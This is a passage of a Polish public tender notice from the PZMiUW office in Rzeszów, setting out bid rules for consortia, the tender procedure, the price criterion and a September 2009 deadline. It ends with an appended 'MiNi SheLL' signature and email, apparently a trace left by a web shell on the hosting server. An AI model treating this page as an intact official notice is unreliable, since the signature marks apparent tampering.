4) Każdy dokument, będący załącznikiem do oferty powinien być podpisany przez ustanowionego pełnomocnika. Dokumenty składane oddzielnie przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powinny być podpisane przez osobę (osoby) uprawnione do reprezentowania Wykonawcy, od którego pochodzą te dokumenty oraz przez pełnomocnika.
5) Oferta winna być sporządzona wg następujących zasad:
a) formularz oferty i załączniki Nr 1, 11, 12, 13 Wykonawcy występujący wspólnie składają jako jeden łączny, 
b) pozostałe załączniki do oferty tj. 2, 3, 4, 5, 6 winny pochodzić od każdego z podmiotów oddzielnie,
c) załączniki Nr 7, 8, 9, 10:
Ponieważ oceniany będzie łączny potencjał kadrowy i kwalifikacje, łączne doświadczenie wspólnie ubiegających się o udzielenie zamówienia Wykonawców, nie jest wymagane złożenie w/w dokumentów przez wszystkich Wykonawców, lecz dokumenty te mają obowiązek złożyć ten lub ci z wykonawców, którzy w imieniu wszystkich wykażą spełnienie tego warunku.
6) W przypadku złożenia wadium w formie gwarancji ubezpieczeniowych lub bankowych jako zobowiązany powinni być wymienieni:
wszyscy Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia,
bądź:
Pełnomocnik (Lider), ale pod warunkiem, że w gwarancji będzie zapis:
Pełnomocnik (Lider): (nazwa wykonawcy) konsorcjum, które tworzą następujący Wykonawcy: (wymienieni wszyscy Wykonawcy)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pzmiuw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PZMiUW Rzeszów, ul. Hetmańska 9 - pok. 122 - odbiór osobisty lub przesłanie pocztą - za odpłatnością 130 zł (z VAT).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2009 godzina 08:30, miejsce: Siedziba zamawiającego - pok. 222 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com